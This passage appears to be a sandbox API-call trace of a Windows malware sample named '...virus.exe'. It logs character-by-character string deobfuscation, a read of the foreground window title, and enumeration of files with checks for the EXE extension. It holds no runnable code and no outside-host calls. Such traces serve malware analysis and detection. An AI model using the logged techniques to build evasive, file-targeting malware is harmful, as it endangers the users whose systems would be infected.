[0180.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.931] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.931] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.932] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.932] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.933] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.933] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.933] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.934] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.934] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.934] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.935] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.935] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.936] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.936] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.936] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.937] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.937] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.937] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.938] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.938] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.939] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.939] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.940] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.940] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.940] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.941] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.941] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.942] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.942] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.942] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.943] GetForegroundWindow () returned 0x20086 [0180.943] GetLastError () returned 0x0 [0180.943] SysStringLen (param_1=" ") returned 0xff [0180.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.943] SysStringLen (param_1=" ") returned 0xff [0180.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.943] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.943] GetLastError () returned 0x0 [0180.944] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.944] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.944] SysStringLen (param_1="Pr") returned 0x2 [0180.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pr", cchWideChar=3, lpMultiByteStr=0x1150ca4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pr", lpUsedDefaultChar=0x0) returned 3 [0180.994] SetWindowTextA (hWnd=0x103c4, lpString="Pr") returned 1 [0180.994] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.994] GetFocus () returned 0x0 [0180.994] lstrlenA (lpString="Pr") returned 2 [0180.994] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0180.995] IsWindow (hWnd=0x103c4) returned 1 [0180.995] IsWindow (hWnd=0x103c4) returned 1 [0180.995] IsWindow (hWnd=0x103c4) returned 1 [0180.995] IsWindow (hWnd=0x103c4) returned 1 [0180.996] GetFocus () returned 0x0 [0180.996] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0180.996] GetFocus () returned 0x0 [0180.996] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0180.997] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0180.997] GetFocus () returned 0x0 [0180.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0180.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pr", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=3 | out: lpWideCharStr="Pr") returned 3 [0180.997] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.997] VarBstrCmp (bstrLeft="Pr", bstrRight="Sc", lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.997] SetTimer (hWnd=0x103bc, nIDEvent=0x103bc, uElapse=0x64, lpTimerFunc=0x0) returned 0x103bc [0180.998] PeekMessageA (in: lpMsg=0x28f564, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f564) returned 0 [0180.998] GetTickCount () returned 0x1d19fa8 [0180.998] IsWindowVisible (hWnd=0x103b8) returned 0 [0180.998] Sleep (dwMilliseconds=0x0) [0181.039] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf2d694, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f65c*="path", cNames=0x1, lcid=0x409, rgDispId=0x28f660 | out: rgDispId=0x28f660*=0) returned 0x0 [0181.039] FileSystemObject:IDispatch:Invoke (in: This=0xf2d694, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f610, puArgErr=0x28f640 | out: pDispParams=0x28f630*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe"), varVal2=0x0), pExcepInfo=0x28f610*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f640*=0x72a478d9) returned 0x0 [0181.040] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0xf22c80, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f64c*="GetExtensionName", cNames=0x1, lcid=0x409, rgDispId=0x28f650 | out: rgDispId=0x28f650*=10008) returned 0x0 [0181.041] FileSystemObject:IDispatch:Invoke (in: This=0xf22c80, dispIdMember=10008, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0, pExcepInfo=0x28f600, puArgErr=0x28f630 | out: pDispParams=0x28f620*(rgvarg=([0]=0x28f6a8*(varType=0x8, wReserved1=0x0, wReserved2=0xd5a0, wReserved3=0xf2, varVal1=0x1168f7c*, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x28f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="exe", varVal2=0x0), pExcepInfo=0x28f600*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f630*=0x72a478d9) returned 0x0 [0181.041] CharUpperBuffW (in: lpsz="exe", cchLength=0x4 | out: lpsz="EXE") returned 0x4 [0181.041] VarCmp (pvarLeft=0x28f8e0, pvarRight=0x28f8b0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.042] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 0 [0181.042] GetTickCount () returned 0x1d19fd6 [0181.042] GetTickCount () returned 0x1d19fd6 [0181.042] GetTickCount () returned 0x1d19fd6 [0181.042] GetTickCount () returned 0x1d19fd6 [0181.043] IsWindowVisible (hWnd=0x103b8) returned 0 [0181.043] Sleep (dwMilliseconds=0x0) [0181.103] FileSystemObject:IUnknown:Release (This=0xf2d694) returned 0x0 [0181.103] FileSystemObject:IEnumVARIANT:Next (in: This=0xf2d638, celt=0x1, rgvar=0x28f984*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf2d694, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0 [0181.104] PeekMessageA (in: lpMsg=0x28f5e8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28f5e8) returned 1 [0181.104] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28f54c) returned 0x0 [0181.104] IsWindow (hWnd=0x103bc) returned 1 [0181.104] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0181.104] IsIconic (hWnd=0x103b8) returned 0 [0181.104] GetParent (hWnd=0x103bc) returned 0x103b8 [0181.105] TranslateMessage (lpMsg=0x28f5e8) returned 0 [0181.105] DispatchMessageA (lpMsg=0x28f5e8) returned 0x0 [0181.105] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0181.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.106] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.106] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.107] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.107] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.107] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.108] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.108] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.109] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.109] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.109] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.110] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.110] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.111] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.111] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.112] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.112] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.112] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0181.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | 